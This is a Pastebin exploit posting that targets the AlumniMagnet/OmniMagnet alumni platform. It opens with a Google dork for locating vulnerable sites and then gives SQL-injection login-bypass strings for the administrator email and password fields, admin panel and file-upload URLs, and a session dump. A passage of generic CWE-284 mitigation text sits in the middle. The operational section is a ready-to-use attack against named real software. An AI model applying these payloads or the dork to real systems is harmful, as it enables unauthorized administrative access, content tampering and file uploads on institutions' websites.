Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : AlumniMagnet OmniMagnet Improper Access Control Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/05/2019
- # Vendor Homepage : alumnimagnet.com ~ support.omnimagnet.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Powered By AlumniMagnet + inurl:/article.html?aid= site:org
- # Vulnerability Type : CWE-284 [ Improper Access Control ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The top alumni associations in the world use AlumniMagnet as their alumni engagement
- and volunteer management platform. Made for large universities and colleges, schools
- and their chapters. Enterprise Edition involves all of the Central features, but also brings
- in connectivity between the university's alumni office and all of its associated
- chapters, classes, and clubs.
- ####################################################################
- # Impact :
- ***********
- The software does not restrict or incorrectly restricts access to a resource from
- an unauthorized actor.
- There are two distinct behaviors that can introduce access control weaknesses:
- Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for
- either the user or the resource (for example, setting a password file to be world-writable, or
- giving administrator capabilities to a guest user). This action could be performed by
- the program or the administrator. Performing of activities carried out only by administrator
- or program became available for all the users.
- Enforcement: the mechanism contains errors that prevent it from properly enforcing the
- specified access control requirements (e.g., allowing the user to specify their own privileges, or
- allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs
- within the program itself, in that it does not actually enforce the intended security
- policy that the administrator specifies.
- Potential Mitigations
- Phases: Architecture and Design; Operation
- Very carefully manage the setting, management, and handling of privileges.
- Explicitly manage trust zones in the software.
- Phase: Architecture and Design
- Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be
- unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary
- and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design and that
- the compartmentalization serves to allow for and further reinforce privilege separation
- functionality. Architects and designers should rely on the principle of least privilege
- to decide when it is appropriate to use and to drop system privileges.
- ####################################################################
- # Improper Access Control Exploit :
- ********************************
- Non-Alumni Staff Administrator Page Login Path :
- *******************************************
- /user.html?op=login&non_alum=true
- Faculty, Staff, Parents, and Non-Alumni
- Members and Guests – click here and login below.
- Administrator E-Mail Address :
- ****************************
- 'or''='@gmail.com
- 'or''='@yahoo.com
- 'or''='@hotmail.com
- Administrator Password :
- ***********************
- 'or''='
- ' or 1=1 limit 1 -- -+
- anything' OR 'x'='x
- Useable Admin Control Panel Links :
- ********************************
- We can change the articles on the homepage
- without administrator permission.
- /admin_article.html
- /article.html?aid=[ID-NUMBER]
- /admin_article.html?op=edit&aid=[ID-NUMBER]
- /admin_files.html
- /admin_files.html?sub_op=upload_files
- Allowed files: jpg, png, gif, pdf, psd, eps, xls, xlsx, doc, docx, csv, txt, p12
- Upload a File. Click Manage Uploads.
- At the bottom of the page you can see the link showing where the image is going.
- /images/vault/[ID-NUMBER].jpg
- Look at File Destination => 'file_dest' => 'images/vault/[ID-NUMBER].jpg',
- array (
- 'captcha' =>
- array (
- 0 => '[RANDOM-ID-NUMBER]',
- ),
- 'current_user' => '1',
- 'current_user_first_name' => 'Magnet',
- 'current_user_aux_id' => '',
- 'current_user_permissions' => '[RANDOM-ID-NUMBER]',
- 'current_user_email' => '[email protected]',
- 'current_user_nickname' => 'Magnet Team',
- 'signed_in_at' => '[DOMAIN-ADDRESS-HERE]',
- 'main_code' => NULL,
- 'last_update_date' => '[RANDOM-ID-NUMBER]',
- 'current_user_authenticated' => 'y',
- 'last_action_requested' => '[DOMAIN-ADDRESS-HERE]/admin_files.html?sub_op=upload_files',
- 'file_dest' => 'images/vault/[ID-NUMBER].jpg',
- Sometimes it gives error like this -
- Then you cannot have an admin account.
- ************************************
- Access denied...
- The page you requested requires staff clearance.
- Make sure you are logged into the system before you proceed.
- If you feel that this is an error, please contact an admin.
- Authentication Error
- Error code 201
- The email/password combination you have entered does not match.
- Please check your records and try again.
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment